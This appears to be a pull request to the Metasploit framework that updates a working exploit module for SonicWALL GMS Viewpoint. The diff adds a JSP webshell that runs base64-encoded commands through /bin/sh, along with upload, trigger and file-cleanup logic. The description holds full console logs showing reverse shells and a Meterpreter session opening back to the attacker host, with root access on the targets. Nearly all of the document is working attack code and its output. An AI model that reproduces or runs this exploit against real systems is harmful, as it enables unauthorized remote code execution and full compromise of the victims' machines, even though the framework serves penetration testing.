### PR TITLE
added CMD type payload for unix targets

### DIFF
--- a/modules/exploits/multi/http/sonicwall_gms_upload.rb
+++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb
@@ -14,7 +14,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::EXE
-	include Msf::Exploit::FileDropper
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -43,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					[ 'EDB', '24204' ]
 				],
 			'Privileged'  => true,
-			'Platform'    => [ 'win', 'linux' ],
+			'Platform'    => [ 'win', 'linux', 'unix' ],
 			'Targets'     =>
 				[
 					[ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2',
@@ -54,8 +53,9 @@ class Metasploit3 < Msf::Exploit::Remote
 					],
 					[ 'SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)',
 						{
-							'Arch' => ARCH_X86,
-							'Platform' => 'linux'
+							'Arch' => ARCH_CMD,
+							'Platform' => [ 'linux', 'unix' ],
+							'RequiredCmd' => 'generic bash telnet'
 						}
 					]
 				],
@@ -70,10 +70,58 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 
-	def on_new_session
-		# on_new_session will force stdapi to load (for Linux meterpreter)
+	def on_new_session(session)
+		if session.type == "meterpreter"
+			session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
+		end
+
+		@dropped_files.delete_if do |file|
+			win_file = file.gsub("/", "\\\\")
+			if session.type == "meterpreter"
+				begin
+					# Meterpreter should do this automatically as part of
+					# fs.file.rm().  Until that has been implemented, remove the
+					# read-only flag with a command.
+					if target['Platform'] == 'win'
+						session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
+					end
+					session.fs.file.rm(file)
+					print_good("Deleted #{file}")
+					true
+				rescue ::Rex::Post::Meterpreter::RequestError
+					false
+				end
+			else
+				cmds = [
+					%Q|attrib.exe -r "#{win_file}"|,
+					%Q|del.exe /f /q "#{win_file}"|,
+					%Q|rm -f "#{file}" >/dev/null|,
+				]
+
+				# We need to be platform-independent here. Since we can't be
+				# certain that {#target} is accurate because exploits with
+				# automatic targets frequently change it, we just go ahead and
+				# run both a windows and a unixy command in the same line. One
+				# of them will definitely fail and the other will probably
+				# succeed. Doing it this way saves us an extra round-trip.
+				session.shell_command_token(cmds.join(" ; "))
+				print_good("Deleted #{file}")
+				true
+			end
+		end
+
+		@dropped_files.each do |f|
+			print_warning("This exploit may require manual cleanup of: #{f}")
+		end
+
 	end
 
+	def register_files_for_cleanup(*files)
+		@dropped_files ||= []
+		@dropped_files += files
+
+		nil
+	end
 
 	def generate_jsp
 		var_hexpath       = Rex::Text.rand_text_alpha(rand(8)+8)
@@ -146,6 +194,24 @@ class Metasploit3 < Msf::Exploit::Remote
 		return jspraw
 	end
 
+	def java_craft_runtime_exec(cmd)
+		decoder = Rex::Text.rand_text_alpha(5, 8)
+		decoded_bytes = Rex::Text.rand_text_alpha(5, 8)
+		cmd_array = Rex::Text.rand_text_alpha(5, 8)
+
+		jcode =  "<%@ page import=\"sun.misc.*\" %>\n"
+		jcode << "<%\n"
+		jcode << "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n"
+		jcode << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n"
+		jcode << "String [] #{cmd_array} = new String[3];\n"
+		jcode << "#{cmd_array}[0] = \"/bin/sh\";\n"
+		jcode << "#{cmd_array}[1] = \"-c\";\n"
+		jcode << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n"
+		jcode << "Runtime.getRuntime().exec(#{cmd_array});\n"
+		jcode << "%>\n"
+		return jcode
+	end
+
 	def get_install_path
 		res = send_request_cgi(
 			{
@@ -215,28 +281,35 @@ class Metasploit3 < Msf::Exploit::Remote
 		return Exploit::CheckCode::Vulnerable
 	end
 
-	def exploit
-		@peer = "#{rhost}:#{rport}"
-		@uri = normalize_uri(target_uri.path)
-		@uri << '/' if @uri[-1,1] != '/'
+	def exploit_linux
+		# Upload the JSP and the raw payload
+		@jsp_name = rand_text_alphanumeric(8+rand(8))
 
-		# Get Tomcat installation path
-		print_status("#{@peer} - Retrieving Tomcat installation path...")
-		install_path = get_install_path
+		jspraw = java_craft_runtime_exec(payload.encoded)
 
-		if install_path.nil?
-			fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path")
+		print_status("#{@peer} - Uploading the JSP")
+
+		if upload_file(@location, "#{@jsp_name}.jsp", jspraw)
+			print_good("#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp")
+		else
+			fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the jsp")
 		end
 
-		print_good("#{@peer} - Tomcat installed on #{install_path}")
+		print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...")
+		res = send_request_cgi(
+			{
+				'uri'    => "#{@uri}appliance/#{@jsp_name}.jsp",
+				'method' => 'GET'
+			})
 
-		if target['Platform'] == "linux"
-			@location = "#{install_path}webapps/appliance/"
-		elsif target['Platform'] == "win"
-			@location = "#{install_path}webapps\\appliance\\"
+		if res and res.code != 200
+			print_warning("#{@peer} - Error triggering the payload")
 		end
 
+		register_files_for_cleanup("#{@location}#{@jsp_name}.jsp")
+	end
 
+	def exploit_windows
 		# Upload the JSP and the raw payload
 		@jsp_name = rand_text_alphanumeric(8+rand(8))
 
@@ -253,7 +326,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the Payload")
 		end
 
-		print_status("#{@peer} - Uploading the payload")
+		print_status("#{@peer} - Uploading the JSP")
 
 		if upload_file(@location, "#{@jsp_name}.jsp", jspraw)
 			print_good("#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp")
@@ -274,6 +347,34 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		register_files_for_cleanup("#{@location}#{@var_hexfile}.txt")
 		register_files_for_cleanup("#{@location}#{@jsp_name}.jsp")
+	end
+
+	def exploit
+		@peer = "#{rhost}:#{rport}"
+		@uri = normalize_uri(target_uri.path)
+		@uri << '/' if @uri[-1,1] != '/'
+
+		# Get Tomcat installation path
+		print_status("#{@peer} - Retrieving Tomcat installation path...")
+		install_path = get_install_path
+
+		if install_path.nil?
+			fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path")
+		end
+
+		print_good("#{@peer} - Tomcat installed on #{install_path}")
+
+		@location = "#{install_path}webapps/appliance/"
+
+		# Exploit
+		if target['Platform'] == "win"
+			@location = "#{install_path}webapps\\appliance\\"
+			exploit_windows
+		else
+			@location = "#{install_path}webapps/appliance/"
+			exploit_linux
+		end
+
 	end
 
 end


### PR DESCRIPTION
#1369 plus linux target switched to CMD type, because @wchen-r7 has detected issues while testing the linux meterpreter as payload for the linux target. Tested the CMD compatible payloads.

Testing on linux
- cmd/unix/reverse

```
msf  exploit(sonicwall_gms_upload) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[-] Exploit failed: The following options failed to validate: RHOST.
msf  exploit(sonicwall_gms_upload) > set rhost 192.168.1.172
rhost => 192.168.1.172
msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[-] Exploit failed: The following options failed to validate: LHOST.
msf  exploit(sonicwall_gms_upload) > set lhost 192.168.1.129
lhost => 192.168.1.129
msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[*] Started reverse double handler
[*] 192.168.1.172:80 - Retrieving Tomcat installation path...
[+] 192.168.1.172:80 - Tomcat installed on /opt/GMSVP/Tomcat/
[*] 192.168.1.172:80 - Uploading the JSP
[+] 192.168.1.172:80 - JSP successfully uploaded to /opt/GMSVP/Tomcat/webapps/appliance/i5bmsgX1Xx.jsp
[*] Triggering payload at '/i5bmsgX1Xx.jsp' ...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo XwMlKDgFvBa8YFyJ;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "XwMlKDgFvBa8YFyJ\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.129:4444 -> 192.168.1.172:37857) at 2013-01-25 00:49:47 +0100
[+] Deleted /opt/GMSVP/Tomcat/webapps/appliance/i5bmsgX1Xx.jsp

3765428562
IAIjdwGBmAeGvoOhYagCZcunGmrZNsge
sh: line 4: attrib.exe: command not found
sh: line 4: del.exe: command not found
OSidCBAvZZAzFRtRPFFvjGuJcefhTmKl
id
uid=0(root) gid=0(root)
^C
Abort session 1? [y/N]  y

```
- generic_shell_reverse_tcp

```
msf  exploit(sonicwall_gms_upload) > set payload generic/shell_reverse_tcp 
payload => generic/shell_reverse_tcp
msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.129:4444 
[*] 192.168.1.172:80 - Retrieving Tomcat installation path...
[+] 192.168.1.172:80 - Tomcat installed on /opt/GMSVP/Tomcat/
[*] 192.168.1.172:80 - Uploading the JSP
[+] 192.168.1.172:80 - JSP successfully uploaded to /opt/GMSVP/Tomcat/webapps/appliance/F5QlElRiDW1x1A.jsp
[*] Triggering payload at '/F5QlElRiDW1x1A.jsp' ...
[*] Command shell session 3 opened (192.168.1.129:4444 -> 192.168.1.172:37861) at 2013-01-25 00:50:53 +0100
[+] Deleted /opt/GMSVP/Tomcat/webapps/appliance/F5QlElRiDW1x1A.jsp

654092865
zgUZCzZTXrjbsdChLUinhdSNEXfccbAF
sh: line 3: attrib.exe: command not found
sh: line 3: del.exe: command not found
uRezOJQzcyLksvRaiYROpvTcQXGUaAJB
id
uid=0(root) gid=0(root)
^C
Abort session 3? [y/N]  y

[*] 192.168.1.172 - Command shell session 3 closed.  Reason: User exit
```
- reverse_bash

```
msf  exploit(sonicwall_gms_upload) > set payload cmd/unix/reverse_bash 
payload => cmd/unix/reverse_bash
msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.129:4444 
[*] 192.168.1.172:80 - Retrieving Tomcat installation path...
[+] 192.168.1.172:80 - Tomcat installed on /opt/GMSVP/Tomcat/
[*] 192.168.1.172:80 - Uploading the JSP
[+] 192.168.1.172:80 - JSP successfully uploaded to /opt/GMSVP/Tomcat/webapps/appliance/QOTqSsKQOUP.jsp
[*] Triggering payload at '/QOTqSsKQOUP.jsp' ...
[*] Command shell session 4 opened (192.168.1.129:4444 -> 192.168.1.172:37862) at 2013-01-25 00:51:43 +0100
[+] Deleted /opt/GMSVP/Tomcat/webapps/appliance/QOTqSsKQOUP.jsp

644436603
vrjvxoyfcmYykFUDMIjYAOTJDrHnPSyg
sh: line 3: attrib.exe: command not found
sh: line 3: del.exe: command not found
uHwqnrYwncOwaMiualQNtvfzxYGFFled
id
uid=0(root) gid=0(root)
^C
Abort session 4? [y/N]  y

[*] 192.168.1.172 - Command shell session 4 closed.  Reason: User exit

```

And windows

```
msf  exploit(sonicwall_gms_upload) > set rhost 192.168.1.140
rhost => 192.168.1.140
msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.129:4444 
[*] 192.168.1.140:80 - Retrieving Tomcat installation path...
[+] 192.168.1.140:80 - Tomcat installed on C:\GMSVP\Tomcat\
[*] 192.168.1.140:80 - Uploading the payload
[+] 192.168.1.140:80 - Payload successfully uploaded to C:\GMSVP\Tomcat\webapps\appliance\YVPoQFckSodbN.txt
[*] 192.168.1.140:80 - Uploading the JSP
[+] 192.168.1.140:80 - JSP successfully uploaded to C:\GMSVP\Tomcat\webapps\appliance\z6nmG49ZFU.jsp
[*] Triggering payload at '/z6nmG49ZFU.jsp' ...
[*] Sending stage (752128 bytes) to 192.168.1.140
[*] Meterpreter session 5 opened (192.168.1.129:4444 -> 192.168.1.140:1142) at 2013-01-25 00:53:00 +0100
[+] Deleted C:\GMSVP\Tomcat\webapps\appliance\YVPoQFckSodbN.txt
[+] Deleted C:\GMSVP\Tomcat\webapps\appliance\z6nmG49ZFU.jsp

meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > Interrupt: use the 'exit' command to quit
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.140 - Meterpreter session 5 closed.  Reason: User exit

```
